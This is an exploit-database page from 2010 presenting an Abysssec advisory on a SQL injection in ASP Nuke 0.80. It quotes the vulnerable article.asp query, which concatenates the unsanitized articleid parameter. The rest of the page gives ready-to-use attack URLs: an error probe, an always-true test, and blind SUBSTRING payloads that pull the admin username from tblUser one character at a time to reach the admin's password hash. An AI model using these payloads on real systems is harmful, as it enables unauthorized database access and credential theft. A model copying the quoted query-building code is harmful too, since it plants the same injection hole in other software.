[webapps / 0day] - ASP Nuke SQL Injection Vulnerability
Posted on 10 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>ASP Nuke SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================== ASP Nuke SQL Injection Vulnerability ==================================== Title : ASP Nuke Sql Injection Vulnerability Affected Version : AspNuke 0.80 Discovery : www.abysssec.com Vendor : http://www.aspnuke.com Download Links : http://sourceforge.net/projects/aspnukecms/ Description : =========================================================================================== 1)- SQl Injection This version of ASP Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Valnerable Code in .../module/article/article/article.asp: Ln 37: sStat = "SELECT art.ArticleID, art.Title, art.ArticleBody, " &_ " auth.FirstName, auth.LastName, " &_ " cat.CategoryName, art.CommentCount, " &_ " art.Created " &_ "FROM tblArticle art " &_ "INNER JOIN tblArticleAuthor auth ON art.AuthorID = auth.AuthorID " &_ "INNER JOIN tblArticleToCategory atc ON atc.ArticleID = art.ArticleID " &_ "INNER JOIN tblArticleCategory cat ON atc.CategoryID = cat.CategoryID " &_ "WHERE art.ArticleID = " & steForm("articleid") & " " &_ "AND art.Active <> 0 " &_ "AND art.Archive = 0" Considering to the code, you can browse these URLs: http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown) http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true) with the following URL you can find the first character of Username: http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)-- and second character: http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)-- and so on. So you gain Admin's information like this: Username : admin Password : (sha256 hash) Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file. =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-10]</pre></body></html>
